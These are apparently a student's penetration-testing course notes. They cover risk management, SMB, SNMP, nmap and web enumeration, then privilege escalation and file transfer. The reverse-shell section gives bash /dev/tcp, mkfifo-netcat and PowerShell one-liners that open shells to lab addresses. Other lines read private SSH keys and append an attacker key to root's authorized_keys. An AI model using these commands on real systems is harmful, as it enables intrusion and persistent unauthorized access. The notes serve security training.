2. Getting Started

Risk Management

Data protection on policy without negatively affecting org

  1. Identify: Legal, environmental, market, regulatory, etc...

  2. Analyze: Determines impact, probability. Mapped to policies, procedures, processes

  3. Evaluate: Org decides to accept unavoidable, avoid (change plans), control (mitigate) or transfer risk (insure)

  4. Deal: Eliminate as possible. Interfacing with stakeholders

  5. Monitor: Situational changes that could change impact, from low-medium-high impact

Handy Cmds:

netstat -rn // show accessible networks w/vpn

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.1.2     0.0.0.0         UG        0 0          0 eth0
10.10.14.0      0.0.0.0         255.255.254.0   U         0 0          0 tun0
10.129.0.0      10.10.14.1      255.255.0.0     UG        0 0          0 tun0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0

Services

Server Message Block:

  • SMB allows users, admins to share folders, make them accessible

  • A tool that can enum with SMB shares is smbclient

  • -L Retrieve list of avail shares on remote host

  • -N Suppress passwd

  • get file.txt Download a file

#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares
smbclient \\\\10.10.10.0\\users # connect to SMB share
smbclient --no-pass -L //10.10.10.1 # null user
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # use NT hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session to share

#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # scan snmp on ip 
snmpget -V # what version is running locally?

#handy OID's to know
1.3.6.1.2.1.1.1.0 # system description
1.3.6.1.4.1.77.1.2.25 # win usrs
1.3.6.1.2.1.25.4.2.1.2 # running procs
1.3.6.1.2.1.2.2.1.2 # int name
1.3.6.1.2.1.6.13.1.3 # open tcp ports
1.3.6.1.2.1.25.6.3.1.2 # software
1.3.6.1.2.1.25.2.3.1.4 # storage units
1.3.6.1.2.1.4.35 # nat table
1.3.6.1.2.1.4.21 # ip route table
1.3.6.1.2.1.31.1.1.1 # wireless table

#other 
onesixtyone -c brute.txt 10.10.10.1 # brute force snmp secret
enum4linux -a # enum4linux scan

Tmux primer by ippsec

Vim Primer

Netcat: Win: netcat | Win alt: PowerCat socat Features nc doesn't have (fwding ports, connecting to serial devices)


#tmux
ctrl +b # default prefix
prefix c # new window
prefix 1 # swap to window 1
prefix + shift + % # split vertically
prefix + shift + " # split horizontally
prefix + -> # swap to right pane

#vim
esc + i # insert mode
esc # normal mode 
x # cut char
dw # cut word 
dd # cut line
yw # cp word
yy # cp line
p # paste
:1 # go to line 1
:w # write file 'save'
:q # quit
:q! # save/quit

nmap


#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/critrix # list nmap scripts
ls /usr/share/nmap/scripts | snmp # also lists nmap scripts
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run nse script 
nmap --script=banner -p 80 10.10.10.1 # banner grab

#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

#netcat 
nc 10.10.10.1 # banner grab

sudo apt install seclists -y # install seclists

Web Enums

  • ffuf or GoBuster to perform dir enum

  • Additional functionality, such as enum public AWS S3 buckets

Add a DNS Server such as 1.1.1.1 to /etc/resolv.conf

  • EyeWitness/Aquatone can be used to take screens of targets, fingerprint, and id for default creds

Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use

  • Viewing cert reveals details: Programs like testssl.sh and sslscan are great for this

  • Email/company name could be used to conduct a phishing attack if in scope

  • robots.txt Common for sites to contain:

    • Tells engines/crawlers like Googlebot which resources can/can't be accessed for indexing

    • Can provide location of private files/admin pages

  • Source Code: Worth checking source code for any pages

#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt #dir scan
gobuster dns -d site.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt #subd 

feroxbuster -x php -u http://10.10.10.1 # look for php in search
dirsearch -u http://10.10.10.1

curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # banner grab

whatweb --no-errors 10.10.10.1 # web server/cert details
ctrl +U # view page source in browser

Virtual Machines

Folder Structure: Have clear folder structure on machine to save data

moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
    ├── EPT (External Pentest)
    │   ├── evidence
    │   │   ├── credentials
    │   │   ├── data
    │   │   └── screenshots
    │   ├── logs
    │   ├── scans
    │   ├── scope
    │   └── tools

What's a shell?

A program that takes input from user and passes cmds to OS for tasks

bash was originally Unix's sh, and others like zsh, tcsh, ksh, etc.. exist

Shell Types

Initiates connection back to a listener on our attack box


Public Exploits

sudo apt install exploitdb -y
searchsploit openssh 7.2

Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vuln Lab

Metasploit Framework: Contains built-in exploits of public vulns

  • Recon scripts enum hosts, compromised targets

  • Verification scripts validate vulnerabilities without hacking it

  • Meterpreter -Connect to shells, run cmds on hacked targets

  • Post-exploit/pivot tools

Reverse Shell Commands

Cmd we exec depends on OS a compromised host runs: What apps/cmds we can access

  • Payload All The Things: Comprehensive list of revshells we can use

  • Certain cmds are more reliable: Can be attempted to get a reverse connection

bash -c 'bash -i >& /dev/tcp/x.x/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"
  • Once cmd loses connection: Have to rerun exploit for access


Privilege Escalation

HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker,

Win: Seatbelt, JAWS, PEASS || Noisy: Will trigger stuff

dkpg -l # see what software is installed
C:\Program Files # see what software is installed windows 
find / -perm -u=s -type f 2>/dev/null # find all perms with s
sudo -l # check what sudo privs we have

User Privileges

Allows a user to exec cmds as a diff user: Lower priv users to exec cmds as root without access

  • GTFOBins List of cmds/how they can be exploited through sudo

  • LOLBAS List of Win apps leverage, like downloading files/exec cmds


Scheduled Tasks

Cron jobs: Form of scheduling tasks with specific dirs we utilize to add jobs: Need right perms

1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root
  • If we can write to a dir called by a cron job: should send us a shell when exec

Exposed Credentials Common config files, logs, user history (bash_history/PSReadLine in Win)

SSH Keys If we have read access over .ssh dir for a specific user

  • We might be able to read priv ssh keys in

    • /home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use that to log in

    • If we can read the /root/.ssh/ dir, we can cp it to our machine using -i

cat /home/user/.ssh/id_rsa or cat /home/root.ssh/id_rsa
vim id_rsa
chmod 600 id_rsa # changes perms to be more restricetive: 
# lax perms means ssh server could prevent them from working  
ssh mootarget@10.10.10.10 -i id_rsa
  • If we see write access to a user/.ssh/ dir, can place our public key in the dir

  • SSH config won't accept keys written by other users, so works if we have control over them

cat /home/user/.ssh/authorized_keys 
ssh-keygen -f key # create new key, -f output file
# 2 files created 
1. key (we use this with ssh -i)
2. key.pub # we copy this to the remote machine
# cp key.pub onto the remote machine
# add it to /home/root/.ssh/authorized_keys

echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this and all we're doing here is appending it to the file
ssh root@10.10.10.1 -i key

Transferring Files Python HTTP server on our machine and wget/cURL to download files

cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server

wget http://10.10.14.1:8000/linenum.sh # has to be in the same dir listed - dl
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh 
# specify local file w/scp, remote dir saved 

Base64 base64 encode the file into b64, paste the str on the remote server, decod

base64 shell -w 0 # xsfer bin file shell, b64 encode it
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU

echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy b64 str, go to remote host: use b64 -d to decode and pip to file

file shell # validate file format
md5sum shell # check md5sums of both files

Last updated